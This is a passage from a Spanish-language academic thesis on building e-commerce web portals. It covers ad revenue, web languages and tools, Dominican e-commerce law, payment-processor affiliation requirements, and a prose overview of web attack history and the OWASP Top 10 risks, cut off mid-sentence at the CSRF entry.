Imagen 2.3.1: Publicidad Directa
Por otro lado el alquiler de espacio puede ser a través de servicios como
adsense, que generan una remuneración al dueño del sitio por cada clic dado
31
por el visitante a los banners publicitarios mostrados en la página, a mayor
número de clic, mayor es el porcentaje de ganancia que recibirá el sitio. De
esta forma sino tienes los recursos para conseguir anunciantes directamente,
simplemente rentas tus espacios publicitarios a una de estas empresas y
adquieres una remuneración por la misma. (ver imagen 2.3.3).
Imagen 2.3.2: Google Adwords Vs Facebook Ads
Existen varias formas de generar dinero a través de la publicidad, tanto por
clics o por CPM13.
Por Clics: Cada vez que un usuario hace clic a un banner publicitario el dueño
del sitio gana una comisión. Si es por CPM el dueño del sitio gana una
comisión por cada mil impresiones del banner.
13
Cost Per Miles o costo por mil, es el nombre que recibe un método de pago por publicidad que es cobrada por cada mil ocasiones que esta se muestra.
32
Cuando se tiene más de un millón de visitas al mes en un portal ganar dinero
por CPM resulta sumamente sencillo ya que mensualmente un sitio puede
generar hasta 21 millones de impresiones partiendo de su naturaleza.
Imagen 2.3.3: Espacio publicitario Alquilado.
Comercio Electrónico: Compra y Venta de artículos de todo tipo a través de
un portal que permite a los usuarios tanto comprar como vender. En un portal
de comercio electrónico el propietario puede hacer dinero gracias a la
publicidad o venta de productos.
33
En sitios especializados como Amazon.com14 o Newegg.com15 se aprovecha
tanto la publicidad que se obtener de los dueños de marcas, como
implementando sistemas de campañas publicitarias como adsense16 y ventas
de productos por tenencia en almacén físico o virtual (ver imagen 2.3.4).
Dicha ventas de productos en almacén se realiza al igual como en un negocio
físico, a diferencia de que en la web el cliente:
- Tiene mayor acceso a la información de los productos
- Puede a ver las opiniones de otros consumidores sobre “x” producto
- Se mantiene mejor informado sobre las ofertas ya que la información es de
fácil acceso.
- Debe de pagar un cargo por envió.
- Puede darle un seguimiento a su pedido a través de servicios de envíos como
UPS, Federal Express, entre otros.
14
Es una compañía dedicada al comercio electrónico y es una de las primeras en vender bienes por Internet. 15
Sitio web dedicado a vender productos electrónicos. Es el sitio preferido de los “gamers” o famosos jugadores, quienes compran compulsivamente las últimas tecnologías del mercado. NewEgg tiene su propio almacén de productos y es bastante famosos entre los sitios donde se pueden adquirir equipos de cómputos. 16
Sistema de publicidad ideado por Google. Donde el contenido de la campaña publicitaria se muestra dependiendo el contenido y blanco de público de la página visitada.
34
Imagen 2.3.4: Sitio de comercio electrónico Amazon.com
Servicios en Línea:
Existen otros métodos de ingresos que son compensatorios a los anteriormente
mencionados, como son los servicios en línea. Los servicios en línea pueden
abarcar diversas ramas, las más populares son las de: Servicio de hospedaje
en línea, Servicio de almacenamiento en línea (rapidshare, hotfile, fileserve,
entre otros), acceso a contenido adulto, entre otros.
35
2.5 - Lenguajes de programación Web.
Se denomina lenguaje de programación a “La notación para comunicarle a
un computador lo que queramos que haga.”(Lenguajes de Programación:
Principios y Practica, 2005).
El siguiente es un ejemplo del lenguaje de programación JAVA donde el
usuario introduce un número y el computador dice si el mismo es o no un
número primo:
public class primo { private int x; public primo() { x = 0; } public void entrada(int numero) { x = numero; } private boolean esprimo(int num) { boolean bandera = true; for(int k=2; k<=num-1; k++) { if(num%k==0) bandera=false; } return bandera; } public void salida() { if(esprimo(x) == true) { System.out.println(x + " es un numero primo"); } else { System.out.println(x + "no es un numero primo"); } }
36
En el caso de la Web, existen diferentes lenguajes que nos permiten crear un
sitio o portal electrónico. Entre ellos están:
- PHP
- ASP/ASP.NET
- JAVA, con sus tecnologías Javaservlet y JavaServer Pages (jsp)
- PERL
- PYTHON
- HTML
- XML
- FLASH
Cabe mencionar que ASP no es en sí un lenguaje de programación es más
bien una arquitectura de desarrollo Web en la que se pueden usar por debajo
distintos lenguajes (por ejemplo VB.NET o C# para ASP.NET o
VBScript/JScript para ASP).17
Las plataformas web más populares son PHP y ASP, pero como lenguaje en sí
de programación tanto web como tradicional lo son JAVA y PHP. (Ver imagen
2.5.1) y es que los usos java dentro como fuera de la web son gigantesco.
17
Web 2.0: Google Docs, Romina Marcela Caivano y Liliana Noemí Villoria (2009)
37
Imagen 2.5.1: Los 25 mejores lenguajes de programación. Fuente Sourceforge
Al momento de programar un sitio web, la pregunta de cuál lenguaje debo
elegir para crear mi sitio tiene su respuesta en la necesidad y finalidad del sitio
web. El fácil uso y los bajos costos de que implica el uso de PHP como
lenguaje para desarrollar páginas web lo ha convertido en líder a nivel mundial,
así como también la amplia gama de soporte que existe para el mismo (ver
imagen 2.5.2).
38
Al ser un software libre usuario de todo el mundo colaboran para mejor
entendimiento y solución de problemas, algo que no sucede con su homologo
ASP que solo funciona en servidores Windows.
Imagen 2.5.2: ASP.NET VS PHP
2.6 - Herramientas de Desarrollo Web.
Las Herramientas de desarrollo web, son aquellos programas de computadoras
que nos permiten desarrollar o crear un sitio web. Estas herramientas sirven
tanto para diseñar como para maquetar o programar los sitios web.
Entre los programas para diseño web los principales son:
39
Adobe Photohop: Adobe Photoshop es software de edición de imágenes
estándar de la industria, que se utiliza en todo el mundo por fotógrafos
profesionales, fotógrafos aficionados, y los diseñadores que desean
perfeccionar sus imágenes digitales18.
Los diseños a ser implementados en las páginas web son creados en software
de diseño grafico como Photoshop. (ver imagen 2.6.1)
Imagen 2.6.1: Photoshop CS4
18
http://www.adobe.com/es/products/photoshop
40
Adobe Fireworks: El software Adobe Fireworks proporciona las herramientas
necesarias para crear gráficos expresivos y altamente optimizados para la Web
o prácticamente cualquier dispositivo: desde teléfonos inteligentes a quioscos y
pantallas incrustadas19.
A diferencia de Photoshop, Adobe Fireworks está más orientado a la web y a la
optimización de imágenes.
Adobe Flash: El software Adobe Flash Professional es el entorno de creación
líder del sector de producción de contenido interactivo expresivo. Cree
experiencias envolventes y preséntelas al público de forma coherente en
ordenadores, teléfonos inteligentes, tabletas y televisores20.
El software Adobe Flash es utilizado comúnmente para crear banners
interactivos en los portales electrónicos. Otro de sus usos es para la creación
de juegos, que pueden ser tanto descargados por los cibernautas como
utilizados desde la misma web. (ver imagen 2.6.2)
Con Adobe Flash se crean páginas web completas. Dichas páginas reciben el
nombre de “full flash sites”. Y es un solo archivo hecho en Flash que contiene
toda la información del sitio, los mismos son comúnmente muy interactivos.
GIMP: es el acrónimo de GNU Image Manipulation Program. Se trata de un
programa de distribución gratuita para tareas como retoque fotográfico,
composición de imágenes y creación de imágenes.21
19
http://www.adobe.com/es/products/fireworks.html 20
http://www.adobe.com/es/products/flash.html 21
http://www.gimp.org/
41
Este programa funciona bastante bien tanto para Windows, Mac como Linux.
Es este último donde más tiene acogida por los usuarios que prefieren el
software libre. (Ver imagen 2.6.3)
Adobe Dreamweaver: Es software líder de edición HTML y diseño Web.
Adobe Dreamweaver es la aplicación que lidera el sector de la edición y
creación de contenidos web. Proporciona funciones visuales y de nivel de
código para crear diseños y sitios web basados en estándares para equipos de
sobremesa, teléfonos inteligentes, tabletas y otros dispositivos.22
Imagen 2.6.2: Juego y Banners creados en Adobe Flash Pro
22
http://www.adobe.com/es/products/dreamweaver.html
42
Servidor HTTP Apache: Es un servidor Web sumamente poderoso y flexible
que implementa el protocolo HTTP/1.123. Es multiplataforma y es muy utilizado
en sitios virtuales. Se utiliza como base para manejar sitios web en la WWW.
Un ejemplo común es cuando hacemos una página en lenguaje PHP el
ambiente donde esta “funcionara” es bajo un servidor Apache.
MySQL: Es el sistema de base de datos relacional libre más famoso del
mundo, que te permite trabajar multiusuario, posee un alto rendimiento, alta
fiabilidad y fácil de usar24.
Es el sistema de base de datos preferido por los desarrolladores web.
Principalmente por ser “gratis”. Además de su fácil uso, MySQL te permite
trabajar con las transacciones de tu sitio web en un ambiente organizado a
nivel de base de datos. Cuando vas a crear tú pagina, después de crear un
servidor Apache, lo siguiente es instalar MySQL para manejar la base de datos
de información que poseerá el sitio.
23
protocolo de transferencia de hipertexto (HTTP): Es un protocolo orientado a transacciones y
sigue el esquema petición-respuesta entre un cliente y un servidor. Es el protocolo utilizado en cada transacción de la World Wide Web. 24
http://www.mysql.com/why-mysql/
43
Imagen 2.6.3: GNU Image Manipulation Program (GIMP)
2.7 - Errores de implementación.
Una buena práctica a tomar en cuenta es la seguridad, práctica que en el ciclo
de vida del desarrollo de una aplicación se toca como último punto o en la
mayoría de los casos ni se llega a priorizar. Un error común por los
desarrolladores es escribir programas con el propósito de poder satisfacer la
necesidad por la cual fue desarrollado el programa, y abandonan el concepto
seguridad.
Cuando se desarrolla software uno primero debe determinar los riesgos de una
aplicación particular. Por ejemplo, el sitio web típico de hoy puede estar sujeto
44
de una variedad de riesgos, variando desde la desfiguración, la negación
distribuida de servicio hasta transacciones con las partes equivocadas25.
2.7.1 - Funcionamiento vs seguridad.
Es muy común encontrarse con aplicaciones que mensualmente o en muchas
casos semanales, tenemos que actualizarla constantemente. Al ver los detalles
de la actualización mayormente tratan de parches de seguridad.
Muchas aplicaciones web mantienen un estado de “beta” para tener como
excusas algún fallo si llegara el momento de un mal funcionamiento, aseguran
que aun están en prueba y no es una versión final de la aplicación.
Manteniendo este estado “beta” no aseguran que la aplicación sea segura al
cien por ciento. Luego de un control de auditoría o repaso del código es que se
toman el tiempo de asegurar la aplicación luego de su implementación, solo por
asegurar el que la aplicación cumple con los requisitos que se esperaban, mas
no que era segura.
2.7.2 - Tiempo vs seguridad.
Cuando programamos, el momento de diseño y desarrollo del código nos toma
más tiempo del establecido debido a la complejidad del programa y otras veces
porque carecemos de comunicación que nos identifique los requerimientos del
programa, debido a esto buscamos la forma de realizar el programa rápido,
funcional y lo más importante, la satisfacción del cliente o de aquel
departamento en la empresa que necesita el programa con urgencia.
25
http://www.galeon.com/neoprogramadores/lselids.htm
45
Para garantizar la satisfacción del beneficiado del programa olvidamos reducir
la existencia de problemas de seguridad en su código que luego se convierten
en vulnerabilidades y garantizar la entrega del mismo; vulnerabilidades que
luego se convierten en amenazas y nos lleva a correr riesgos en los datos de la
empresa o el cliente causando pérdidas millonarias en las mayorías de los
casos.
2.8 - Web Semántica.
La Web Semántica es una Web extendida, dotada de mayor significado en la
que cualquier usuario en Internet podrá encontrar respuestas a sus preguntas
de forma más rápida y sencilla gracias a una información mejor definida. Al
dotar a la Web de más significado y, por lo tanto, de más semántica, se pueden
obtener soluciones a problemas habituales en la búsqueda de información
gracias a la utilización de una infraestructura común, mediante la cual, es
posible compartir, procesar y transferir información de forma sencilla. Esta Web
extendida y basada en el significado, se apoya en lenguajes universales que
resuelven los problemas ocasionados por una Web carente de semántica en la
que, en ocasiones, el acceso a la información se convierte en una tarea difícil y
frustrante26.
Los principales componentes de la Web Semántica son los metalenguajes y los
estándares de representación XML, XML Schema, RDF, RDF Schema y OWL.
26 http://www.w3c.es/divulgacion/guiasbreves/websemantica
46
La OWL (Web Ontology Language Overview) describe la función y relación de
cada uno de estos componentes de la Web Semántica:
I. XML aporta la sintaxis superficial para los documentos estructurados,
pero sin dotarles de ninguna restricción sobre el significado.
II. XML Schema es un lenguaje para definir la estructura de los
documentos XML.
III. RDF es un modelo de datos para los recursos y las relaciones que se
puedan establecer entre ellos. Aporta una semántica básica para
este modelo de datos que puede representarse mediante XML.
IV. RDF Schema es un vocabulario para describir las propiedades y las
clases de los recursos RDF, con una semántica para establecer
jerarquías de generalización entre dichas propiedades y clases.
V. OWL añade más vocabulario para describir propiedades y clases:
tales como relaciones entre clases (p.ej. disyunción), cardinalidad
(por ejemplo "únicamente uno"), igualdad, tipologías de propiedades
más complejas, caracterización de propiedades (por ejemplo
simetría) o clases enumeradas.
47
La usabilidad y aprovechamiento de la Web y sus recursos interconectados
puede aumentar con la web semántica gracias a:
I. Los documentos etiquetados con información semántica (compárese
ésta con la etiqueta <meta> de HTML, usada para facilitar el trabajo
de los robots). Se pretende que esta información sea interpretada por
el ordenador con una capacidad comparable a la del lector humano.
El etiquetado puede incluir metadatos descriptivos de otros aspectos
documentales o protocolarios.
II. Vocabularios comunes de metadatos (Ontología (Informática)) y
mapas entre vocabularios que permitan a quienes elaboran los
documentos disponer de nociones claras sobre cómo deben
etiquetarlos para que los agentes automáticos puedan usar la
información contenida en los metadatos (p.ej. el metadato autor
tenga el significado de "autor de la página" y no el del "autor del
objeto descrito en la página").
III. Agentes automáticos que realicen tareas para los usuarios de estos
metadatos de la Web Semántica
IV. Servicios Web (a menudo con agentes propios) que provean de
información a los agentes. Por ejemplo: un servicio de garantías a
quien un agente pudiera consultar sobre si un comercio electrónico
tiene un historial de mal servicio o de generar correo basura.27Otro
ejemplo es el de las reuniones entre grupos de trabajos, que pueden
ser programadas con mayor eficiencia gracias al uso de la web 27 http://es.wikipedia.org/wiki/Web_sem%C3%A1ntica
48
semántica, ya que está puede mediante un calendario de
actividades, determinar cuál es la mejor fecha para que cada
participante de la reunión asista a la misma, tomando en cuenta
cuales fechas y días libre tiene del calendario público (ej. Google
Calendar).
La Web semántica es el futuro, actualmente Google dio un paso en su
desarrollo, adquiriendo la empresa “metaweb” quienes fueron pioneros en el
desarrollo del concepto.
Actualmente el buscador de Google cuenta con una herramienta llamada
“instant” que predice tu búsqueda aplicando los concepto de la web semántica,
basándose en tu historial de búsqueda, Google descifra el posible resultado de
lo que deseas buscar en la web.
Si se trata de un sito en específico, automáticamente lo carga antes de escribir
“.com” y presionar “Enter”. Si es un búsqueda de un término, basado en tu
historial el buscador analiza tus preferencias y convierte dicho análisis en un
resultado aproximado de lo que deseas. (Ver imagen 2.8.1)
49
Imagen 2.8.1: “Instant” de Google, un ejemplo de Web Semantica
Como lo muestra la imagen 2.8.1, el navegador asume cuales son las posibles
palabras que busco comenzando con “bum”, automáticamente arroja varios
resultados de posibles sitios, y muestra una lista de posibles palabras que se
ajusten a pensamiento del internauta. En este caso la palabra que se pretendía
escribir es “Bumble Bee” que se muestra como penúltima opción en las
posibles palabras que el buscador trato de “adivinar”.
50
CAPÍTULO III: COMERCIO ELECTRÓNICO
51
CAPÍTULO III: COMERCIO ELECTRÓNICO
3.1 - Orígenes.
El comercio electrónico puede ser sucintamente definido como „hacer
negocios electrónicamente‟ (Comisión Europea; 1997). El término Comercio
Electrónico incluye el intercambio electrónico de bienes físicos o intangibles,
como por ejemplo: información. Esto comprende todas las etapas de
transacción, tal como el marketing on-line, los pedidos, el pago y el soporte
para la distribución28.
Algunas formas de comercio electrónico ya existían desde 1978, por
ejemplo el EDI (intercambio electrónico de datos), en sectores como el
automovilístico o la venta minorista y CALS (Computer Assisted Lifecycle
Support) en sectores como la fabricación pesada o la defensa29.
3.2 - Implementación.
Los componentes principales del sistema de negocio que corresponde al
mercado electrónico.
El sistema de negocios virtual para los mercados electrónicos esta
caracterizado por los siguientes componentes:
I. La aplicación sobre la plataforma „World Wide web‟.
II. La infraestructura técnica y organizativa requerida.
28, 2
Internet y Comercio Electrónico, Julián Briz / Isidro lazo, 2a edición, ESIC EDITORIAL, grupo mundi-prensa, deposito lega: m.36.971-2001
52
III. El contenido, los productos y los servicios ofrecidos.
IV. Los clientes de la compañía y sus proveedores y distribuidores.
V. Organismos gubernamentales y otras organizaciones con facultad
reguladora.
VI. Participantes del negocio, incluyendo inversores y propietarios,
asociados de usuarios y sindicatos de trabajadores.
VII. Organizaciones rivales entre sí, que poseen procesos de
negocio y tecnologías compartidas, así como acuerdos entre
empresas.
3.3 - Ley No.126-02 Sobre Comercio Electrónico, Documentos y firma
digital.
El Instituto Dominicano de las Telecomunicaciones (INDOTEL) que como
facultad reguladora ejerce la función de entidad de vigilancia y control de las
actividades desarrolladas por las entidades de certificación. Para este fin se
creó la Ley No.126-02 Sobre Comercio Electrónico, Documentos y firma digital
dice en parte que la presente ley se entenderá por:
I. Comercio electrónico: toda relación de índole comercial, sea o no
contractual, estructurada a partir de la utilización de uno o más
documentos digitales o mensajes de datos o de cualquier otro medio
similar. las relaciones de índole comercial, comprenden, sin limitarse
a ellas, las siguientes operaciones:
a. Toda operación comercial de suministro o intercambio de bienes,
servicios o información.
53
b. Todo acuerdo de distribución.
c. Toda operación de representación o mandato comercial
d. De compra de cuentas por cobrar, a precio de descuento.
e. Entre otras30.
Entre los principios generales se encuentran:
I. Facilitar el comercio electrónico entre y dentro de las naciones.
II. Validar transacciones entre partes que se hayan realizado por medio de
las nuevas tecnologías de información.
III. Promover y adoptar la implantación de nuevas tecnologías.
IV. Promover la uniformidad de aplicación de la ley.
V. Apoyar las prácticas comerciales.
3.3.1 - Norma sobre la protección de los derechos de los usuarios y
consumidores.
Existen normas, orientadas a actividades comerciales; regulación necesaria
para preservar la protección de los consumidores de los servicios de
certificación digital.
Regulación necesaria para preservar la protección de los consumidores de los
servicios de certificación digital.
30
Ley 126-02 Sobre Comercio Electrónico, Documentos y firma digital.
54
Se utilizaron como modelo las disposiciones establecidas en el reglamento
para la solución de controversias entre los Usuarios y las Prestadoras de los
Servicios Públicos de Telecomunicaciones, para evitar duplicidad de
procedimientos ante una misma institución y reducir los costos de operación
que podría representar para el INDOTEL la implementación de un nuevo
sistema.
3.3.2 - Norma sobre la protección de datos personales.
Las entidades de certificación están obligadas a garantizar la protección,
confidencialidad y debido uso de la información suministrada por el suscriptor
esta norma establece un marco normativo en lo que respecta al tratamiento por
los sujetos regulados de los datos de carácter personal de los consumidores y
usuarios de los servicios prestados por éstos.
3.3.3 - Norma sobre medios de pagos electrónicos.
A fines de resguardar la interoperabilidad técnica, así como a fin de cumplir con
las obligaciones de órgano de vigilancia y control de las Entidades de
Certificación, se elaboró, en coordinación con la Junta Monetaria y la
Superintendencia de Bancos, la normativa relativa a la intervención de las
Entidades de Certificación en las Operaciones y Servicios Financieros
asociados a los medios de pagos electrónicos.
La Norma Incluye todos aquellos aspectos relativos a los Documentos Digitales
y Mensajes de Datos a través de los que se realizan operaciones bancarias y
transferencias de fondos electrónicas, así como las obligaciones que incumben
55
a las entidades de intermediación financiera que ofrecen y realizan este tipo de
operaciones con sus clientes.
3.4 - Métodos de Pago.
Las compras en el portal se pueden realizar con el método de pago electrónico,
usar tarjetas de crédito de los diferentes bancos del país y extranjeras, incluso
tarjetas de créditos en dólares.
3.5 - Requisitos de afiliación a empresas procesadoras de pago
Para este fin existen empresas a las cuales es necesario tener una asociación
o certificación, la cual permite mezclar el servicio de compra más el servicio de
transacciones electrónicas.
Las empresas que brindan este servicio son Visanet y Cardnet.
3.5.1 - Requisitos para la afiliación de comercio electrónico en VISANET
para sitio web.
La empresa debe establecer requisitos mínimos de contenido para los sitios
Web de los comercios en relación con los pagos. Estos requisitos para regular
el contenido de los sitios Web son importantes, ya que garantiza que el
consumidor tenga una experiencia de compra positiva y minimiza las
solicitudes de copia por parte de los Tarjetahabientes, así como las disputas,
controversias y contra cargos. Estas medidas redundarán en beneficio de los
Tarjetahabientes, El Cliente y Visanet. Dichos requerimientos se hacen
mediante un formulario de afiliación (ver imagne 3.5.1.1)
56
Imagen 3.5.1.1: Formulario Afiliación Visanet
57
Se requiere al comercio incluir lo siguiente en su sitio Web:
Una descripción completa de los bienes o servicios
○ El Establecimiento debe proporcionar una descripción completa
de los bienes o servicios que ofrece. Por ejemplo, si El
Establecimiento vende efectos eléctricos, debe indicar los
requisitos de voltaje, los cuales varían en distintos países.
● La información que necesita el cliente del Establecimiento para
comunicarse con el comercio, incluyendo la dirección de correo
electrónico o el número de teléfono
○ Puesto que la comunicación con El Establecimiento no siempre
se hace posible a través del sitio Web, el Establecimiento debe
incluir un número telefónico de servicio al cliente o dirección de
correo electrónico con los cuales puedan comunicarse los
Tarjetahabientes para hacer consultas acerca de la transacción.
● Política de devolución, reembolso y cancelación
○ El Establecimiento debe incluir su política de devolución,
reembolso y cancelación en términos claros, a fin de informar a
los Tarjetahabientes cuáles son sus derechos y
responsabilidades, por ejemplo, en caso de que necesiten
devolver un artículo. Si la política de devolución del
58
Establecimiento es limitada o el mismo no hace reembolsos, se
debe comunicar este hecho al Tarjetahabiente en términos muy
claros para Visanet Dominicana 2007 Confidencial 3 que el
Tarjetahabiente esté consciente de ello antes de efectuar la
compra. Así se evitarán malos entendidos, disputas y
controversias.
● Política de entrega
○ No todos los Establecimientos brindan apoyo a la entrega de los
artículos adquiridos. Puesto que los Establecimientos pueden
sufrir pérdidas cuando los artículos comprados no llegan al
cliente, El Establecimiento tiene el derecho de estipular su propia
política con respecto a la entrega de los bienes y servicios que
vende. No obstante, si El Establecimiento ha establecido alguna
restricción o condición especial, la misma debe indicarse y
comunicarse claramente al Tarjetahabiente en su sitio Web.
● Moneda o monedas de transacción
○ Puesto que la base de clientes del comercio electrónico es
mundial, es importante informar al Tarjetahabiente en cuál
moneda se efectuará la transacción antes de que el mismo
proceda a efectuar una compra. La denominación de moneda
debe indicarse claramente, incluyendo el nombre del país, cuando
59
el nombre de la misma pueda dar lugar a confusión. Visanet
debe presentar las transacciones por el monto exacto y en la
moneda de transacción exacta autorizada por el Tarjetahabiente
para efectuar el intercambio y la liquidación de las mismas. Por
consiguiente, ni El Establecimiento ni Visanet deben convertir el
monto de transacción acordado a una moneda distinta. El
Establecimiento puede indicar las equivalencias del monto de
transacción en diferentes denominaciones de moneda pero debe
establecer claramente que dichas equivalencias son para fines de
información exclusivamente.
● Logo de Visanet Dominicana
○ La tienda virtual deberá colocar el logo de Visanet Dominicana
con el link www.visanet.com.do (ver imagen 3.5.1.1)
Imagen 3.5.1.1: Logo Visanet
La información adicional que debe incluirse en el sitio Web del
Establecimiento incluye:
● Aclaraciones con respecto a la privacidad.
● Identificadores que puedan utilizarse fácilmente para cotejar el sitio Web
con el nombre bajo el cual opera el establecimiento.
60
● Cuándo se hace el cargo a la Tarjeta se debe enviar una confirmación
por correo electrónico al Tarjetahabiente.
● Se debe proporcionar información sobre las existencias si el artículo no
está disponible inmediatamente es también una buena práctica.
● El compromiso de responder a todos los mensajes de correo electrónico
y llamadas telefónicas de servicio a los Tarjetahabientes dentro de un
plazo de dos días laborables.
● Advertencia al Tarjetahabiente de que debe guardar una copia del
registro de transacción.
3.5.2 - Requisitos para la afiliación de comercio electrónico en CARDNET
para sitio web.
1.- Carta firmada y Sellada describiendo el tipo de operación que se estará
realizando a través de la página. Debe incluir:
I. Tipo de Comercio u Operación
II. Volumen RD$ esperado de transacciones mensual y anual
III. Tipo de clientes potenciales (Empresas, personas, entre otros)
IV. Tipo de Publicidad a colocar en la página Web
V. Datos de los propietarios (nombre, ciudadanía, cedula,
pasaporte, entre otros)
VI. Detalles de la plataforma tecnológica con que cuenta para
operar
VII. Nombre, teléfonos e e-mail personal del técnico que estaría
laborando con el Consorcio para la implementación
61
2.- Requisitos para afiliación normal (Contrato de afiliación, copia RNC
actualizado, copia Cedula del Presidente, copia estatutos de la compañía,
copia estado de cuenta, copia Lista de suscriptores y/o Nomina de
Accionistas y copia última Asamblea.
3.- Contrato de afiliación especial firmado para los comercios Web.
4.- Carta de compromiso y entendimiento del procedimiento de este tipo
de afiliación
5.- Cuestionario para solicitud de afiliación de comercio bajo la modalidad
de comercio electrónico.
6.- Cuestionario de Auto-evaluación (PCI31)
31
El PCI Security Standards Council es un foro con alcance mundial dedicado al desarrollo en curso, mejora, almacenamiento, diseminación y aplicación de las normas de seguridad para la cuenta de protección de datos y pagos electrónicos. La organización fue fundada por American Express, Discover Financial Services, JCB Internacional, MasterCard Worldwide y Visa Inc.
62
Cuando haces la solicitud de afiliación Web, Carnet te envía un documento (ver
imagen 3.5.2.1) con los datos detallados anteriormente.
Imagen 3.5.2.1: Requisitos afiliación Web Cardnet
3.5.3 - Solicitudes empresa procesadora de pagos en línea AvisorTech
Por otra parte las solicitudes que requiere la empresa AvisorTech (ver imagen
3.5.3.1), pionera en el país en brindar el servicio de pasarela de pago o
procesamiento de pagos electrónicos web son cumplir con los requisitos de
63
Visanet, Cardnet y el relleno de un formulario de solicitud para identificar la
actividad comercial a la cual va dirigida la empresa afiliada entre otros datos
legales.
Imagen 3.5.3.1: Formulario Solicitud Soluciones Comercio Electronico
(AvisorTech).
64
CAPITULO IV
ANTECEDENTES
65
CAPÍTULO IV: ANTECEDENTES
4.1 - Antecedentes.
Realmente la seguridad total en la web no existe. De alguna forma los sistemas
se corrompen. Es por ello que diariamente se publican nuevas
“actualizaciones” y parches a sistemas. La seguridad de la web ha sido
comprometida desde principios de los años 90 cuando en el año 1994 nació el
AOHell, un software que permitía a usuarios con poca experiencia penetrar en
los sistemas de American Online, logrando que cientos de miles de usuarios de
AOL tuvieran sus correos inaccesible por los “Mails Bombers” y los chats
repletos de “Floods” con Spam. 32.
Ya para el año 1996 se hackea el portal del departamento de Justicia de los
Estados Unidos, en el mes de agosto, unos meses después la pagina de la CIA
y a final de ese mismo año la pagina de la Fuerza Aérea norteamericana.
En el año 2000 crean uno de los virus informáticos considerados como más
dañinos de la historia, el gusano ILOVEYOU que infectó millones de personas
alrededor del mundo, una vez más la seguridad web es fácilmente
quebrantada esta vez por un estudiante quien escribió el virus como parte de tu
tesis universitaria.
Aunque no existe una forma 100% segura de mitigar las vulnerabilidades Web,
si es posible tener una baja posibilidad o mínima debilidad, aunque con las
32
Simson L. Garfinkel (1995). "AOHell". The Boston Globe.
66
recientes amenazas nunca se sabe. Y es que en este año 2011 fue creado el
grupo de Hackers LulSec quienes rápidamente hackearon la red de PlayStation
comprometiendo 75 millones de cuentas de usuarios33.
4.2 - Vulnerabilidades en portales electrónicos.
Las vulnerabilidades no son más que las debilidades existentes en algún
sistema el cual permite a un hacker o agente amenazador aplicar diferentes
formas de ingresar y cometer daños alterando la integridad y los datos de una
organización o empresa.
En la actualidad existen muchos ataques conocidos, pero su objetivo principal
siempre son los portales electrónicos por la información valiosa que esta
obtiene, muchos son orientados a la base de datos y otros a los usuarios del
los portales. Cientos de vulnerabilidades se van acumulando sin ser tomadas
en cuenta por los desarrolladores en estos tiempo en sus proyectos; muchos
de los cuales serian resueltos con unas pequeñas líneas.
En estos tiempos los desarrolladores cuentan con soportes, noticias y
publicaciones de los medios para mantenerse informados sobre los ataques y
aun así
33
http://www.cbc.ca/news/business/story/2011/04/27/technology-playstation-data-breach.html
67
4.3 - Ataques Web.
Es una realidad el hecho de que la Web es el foco favorito de los últimos años
para ataques informáticos, y dichos ataques han ido evolucionando al igual que
la web, ya sea a través de las redes sociales o directamente a los servidores
Web.
Dichos ataques que se vienen realizando desde hace mas de 20 años, es en
los últimos años cuando los hackers han trabajo en conjunto y crean grupos de
hackers como Anonymous34 o Lulsec35.
4.3.1 - Agentes amenazadores.
Se le considera agente amenazador a cualquiera ya sea identificado o anónimo
y pueda esquivar o enviar data manipulada a un sistema o pagina web; estos
pueden ser externos, internos y administradores que atenten abusar con el
nivel de privilegio establecido para poder acceder a un fin.
Entre los agentes amenazadores podemos destacar los siguientes: Hackers,
trojanos, spyware, gusanos, entre otros malwares.
34
Grupos de personas, sin una organización definida, que no pertenecen a ninguna asociación, pero que se unen a determinadas protestas y otras acciones que son llevadas a cabo por individuos no identificados. 35
Es un grupo o individuo hacker sombrero gris responsable de varios ataques de alto perfil, incluyendo el robo de más de 1.000.000 de cuentas de usuario de Sony en 2011.
68
4.3.2 - Tipos de ataques.
La OWASP (Open Web Application Security Project), organización dedicada a
permitir a las organizaciones, desarrollar, adquirir y mantener las aplicaciones
en su funcionamiento de forma confiable.
Organización que ha publicado en su portal http://www.owasp.org grandes
cantidades de documentos que orientan a empresas y desarrolladores externos
a las mejores prácticas de seguridad; en el año 2007 publicó un documento
sobre los 10 riesgos más críticos en la seguridad de aplicaciones y portales
web que cuenta con una segunda edición publicada a finales del 2010.
Los atacantes pueden utilizar potencialmente muchos caminos diferentes a
través de una aplicación para hacer daño al negocio u organización. Cada una
de estas rutas representa un riesgo que puede, o no, ser lo suficientemente
grave como para merecer una atención.
A veces, estos caminos son triviales para encontrar y explotar y, a veces son
muy difíciles. Del mismo modo, los daños causados pueden ir de la nada, todo
69
el camino hasta que lo pone fuera del negocio. Para determinar el riesgo
para su organización, puede evaluar la probabilidad asociada a cada agente de
amenaza, de ataque, y debilidad en la seguridad y la combinan con un
estimación de las repercusiones técnicas y de negocio para su empresa. En
conjunto, estos factores determinan el riesgo global.
Para cada aplicación, quizás no exista un agente de amenaza que pueda llevar
a cabo la ataque relevante, o el impacto técnico no puede hacer
ninguna diferencia. Por lo tanto, se debe evaluar cada riesgo para sí
mismo, centrándose en los agentes de amenaza, los controles de seguridad, y
los impactos de negocio en su empresa.
Basándonos en los 10 riesgos más críticos en la seguridad de aplicaciones y
portales web de la OWASP tenemos lo siguiente:
A1 - Injections (Inyecciones): Las fallas de inyección, tales como SQL, OS, y
LDAP, ocurren cuando datos no confiables son enviados a un interprete como
parte de un comando o consulta. Los datos hostiles del atacante pueden
engañar al intérprete en ejecutar comandos no intencionados o acceder datos
no autorizados.
70
A2 - Cross-Site Scripting (XSS) (Secuencia de comandos en sitios
cruzados (xss)):
Las fallas XSS ocurren cada vez que una aplicación toma datos no confiables y
los envía al navegador web sin una validación y codificación apropiada. XSS
permite a los atacantes ejecutar secuencia de comandos en el navegador de la
victima los cuales pueden secuestrar las sesiones de usuario, destruir sitios
web, o dirigir al usuario hacia un sitio malicioso.
A3 - Broken Authentication and Session Management (Pérdida de
Autenticación Gestión de Sesiones): Las funciones de la aplicación
relacionadas a autenticación y gestión de sesiones son frecuentemente
implementadas incorrectamente, permitiendo a los atacantes comprometer
contraseñas, llaves, token de sesiones, o explotar otras fallas de
implementación para asumir la identidad de otros usuarios
A4 - Insecure Direct Object References (Referencia Directa Insegura a
Objetos): Una referencia directa a objetos ocurre cuando un desarrollador
expone una referencia a un objeto de implementación interno, tal como un
fichero, directorio, o base de datos. Sin un chequeo de control de acceso u otra
protección, los atacantes pueden manipular estas referencias para acceder
datos no autorizados.
A5 - Cross-Site Request Forgery (CSRF) (Falsificación de Peticiones en
Sitios Cruzados (CRSF)): Un ataque CSRF obliga al navegador de una
71
